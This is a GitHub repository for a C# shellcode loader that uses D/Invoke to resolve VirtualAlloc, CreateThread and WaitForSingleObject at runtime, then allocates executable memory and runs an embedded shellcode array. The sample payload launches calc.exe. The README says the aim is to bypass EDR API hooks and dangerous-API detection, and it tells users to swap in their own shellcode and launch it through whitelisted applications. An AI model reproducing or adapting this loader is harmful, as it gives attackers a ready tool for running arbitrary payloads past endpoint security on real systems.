├── DInvoke_shellcodeload ├── DInvoke_test │ ├── obj │ │ ├── Debug │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ └── DInvoke_test.csproj.FileListAbsolute.txt │ │ ├── x64 │ │ │ └── Debug │ │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ │ ├── DInvoke_test.exe │ │ │ │ ├── DInvoke_test.pdb │ │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ │ └── DInvoke_test.csproj.FileListAbsolute.txt │ │ └── x86 │ │ │ └── Debug │ │ │ ├── DInvoke_test.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_shellcodeload.csproj.CoreCompileInputs.cache │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ ├── DInvoke_test.csprojAssemblyReference.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── DInvoke_shellcodeload.csprojAssemblyReference.cache │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ ├── DInvoke_test.csproj.FileListAbsolute.txt │ │ │ └── DInvoke_shellcodeload.csproj.FileListAbsolute.txt │ ├── bin │ │ ├── Debug │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ └── DInvoke_test.exe.config │ │ ├── x64 │ │ │ └── Debug │ │ │ │ ├── DInvoke_test.exe │ │ │ │ ├── DInvoke_test.pdb │ │ │ │ └── DInvoke_test.exe.config │ │ └── x86 │ │ │ └── Debug │ │ │ ├── DInvoke_test.exe │ │ │ ├── DInvoke_test.pdb │ │ │ └── DInvoke_test.exe.config │ ├── App.config │ ├── DELEGATES.cs │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── Program.cs │ ├── DInvoke_shellcodeload.csproj │ └── DInvokeFunctions.cs ├── DInvokeFunctions.cs ├── .vs │ └── DInvoke_shellcodeload │ │ └── v16 │ │ └── .suo └── DInvoke_shellcodeload.sln └── README.md /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8cbe608832de71960b68ed54139bfe678dcf5e2b 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvokeFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | public class Class1 4 | { 5 | public Class1() 6 | { 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 859f5f4778afbc6b2872b0cb3c439d8e318d66d2 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a11e0089e974131fc82967a48c6205748c49c6f8 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a11e0089e974131fc82967a48c6205748c49c6f8 2 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/.vs/DInvoke_shellcodeload/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/.vs/DInvoke_shellcodeload/v16/.suo -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.exe -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.pdb -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x64/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/bin/x86/Debug/DInvoke_test.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/DInvoke_shellcodeload_CSharp/HEAD/DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.exe 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\Debug\DInvoke_test.pdb 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x64/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x64\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.exe 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.pdb 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x64\Debug\DInvoke_test.csprojAssemblyReference.cache 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_test.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.csprojAssemblyReference.cache 8 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/DELEGATES.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace DInvoke_Code 9 | { 10 | public class DELEGATES 11 | { 12 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 13 | public delegate IntPtr VirtualAllocRx( 14 | UInt32 lpStartAddr, 15 | UInt32 size, 16 | UInt32 flAllocationType, 17 | UInt32 flProtect 18 | ); 19 | 20 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 21 | public delegate IntPtr CreateThreadRx( 22 | UInt32 lpThreadAttributes, 23 | UInt32 dwStackSize, 24 | IntPtr lpStartAddress, 25 | IntPtr param, 26 | UInt32 dwCreationFlags, 27 | ref UInt32 lpThreadId 28 | ); 29 | 30 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 31 | public delegate UInt32 WaitForSingleObjectRx(IntPtr hHandle, UInt32 dwMilliseconds); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("DInvoke_test")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DInvoke_test")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("1cb19721-958a-48ea-aa5a-f7ce9b116f87")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/obj/x86/Debug/DInvoke_shellcodeload.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 2 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 3 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 4 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 7 | C:\Project\Projects\Project_DInvoke_test\DInvoke_test\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 8 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.exe.config 9 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.exe 10 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\bin\x86\Debug\DInvoke_test.pdb 11 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csprojAssemblyReference.cache 12 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_shellcodeload.csproj.CoreCompileInputs.cache 13 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_test.exe 14 | C:\Project\Projects\Project_DInvoke_Shellcodeload\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\DInvoke_test.pdb 15 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_shellcodeload.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31129.286 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DInvoke_shellcodeload", "DInvoke_test\DInvoke_shellcodeload.csproj", "{1CB19721-958A-48EA-AA5A-F7CE9B116F87}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x64.ActiveCfg = Debug|x64 21 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x64.Build.0 = Debug|x64 22 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x86.ActiveCfg = Debug|x86 23 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Debug|x86.Build.0 = Debug|x86 24 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x64.ActiveCfg = Release|x64 27 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x64.Build.0 = Release|x64 28 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x86.ActiveCfg = Release|x86 29 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {083D650C-8A63-465B-BB85-FA74442890BE} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Diagnostics; 8 | 9 | namespace DInvoke_Code 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | 16 | //Dinvoke test 17 | byte[] codepent = new byte[193] { 18 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 19 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 20 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 21 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 22 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 23 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 24 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 25 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 26 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 27 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 28 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 29 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 30 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 31 | }; 32 | 33 | // Console.WriteLine((uint)codepent.Length); 34 | // System.Threading.Thread.Sleep(10000); 35 | IntPtr func_ptr = IntPtr.Zero; 36 | // IntPtr pHandle = Process.GetCurrentProcess().Handle; 37 | 38 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc"); 39 | DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx; 40 | IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40); 41 | 42 | Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length); 43 | IntPtr hThread = IntPtr.Zero; 44 | IntPtr pinfo = IntPtr.Zero; 45 | UInt32 threadId = 0; 46 | 47 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread"); 48 | DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx; 49 | hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId); 50 | 51 | func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject"); 52 | DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx; 53 | WaitForSingleObjectRx(hThread, 0xFFFFFFFF); 54 | } 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DInvoke_shellcodeload_CSharp 2 | 3 | 4 | 5 | Blog link: May not gonna update. 6 | 7 | * A ShellcodeLoader base on my another project(https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), inspire by TheWover(https://github.com/TheWover). 8 | * The purpose is to bypass EDR 's APIs hook, or danger APIs dectection. 9 | * Use D/Invoke to load shellcode into memory. 10 | * **I removed a lot of unnecessary code from the original project, make the code easy for understanding.** 11 | * You could change the function name or do other magic works make it better for EDR bypassing. 12 | * I only tested it on x86 with the shellcode below(It is a calc shellcode), but it should be able to work on x64. 13 | 14 | ```c# 15 | byte[] codepent = new byte[193] { 16 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 17 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 18 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 19 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 20 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 21 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 22 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 23 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 24 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 25 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 26 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 27 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 28 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 29 | }; 30 | ``` 31 | 32 | * You could use API monitor(http://www.rohitab.com/apimonitor) to test the project, comparing with the SimpleLoader(https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), You could see there is no API call via D/Invoke. 33 | * Kernel functions are not good enough,you could even do the ntdll version of this. 34 | 35 | 36 | ## Usage 37 | 38 | 1. Just replace the shellcode. 39 | 2. Launch it through some white list applications 40 | 41 | 42 | ## Comparing via API monitor 43 | 44 | There are mainly 3 APIs we are gonna monitor: 45 | 46 | * VirtualAlloc 47 | * CreateThread 48 | * WaitForSingleObject 49 | 50 | 51 | 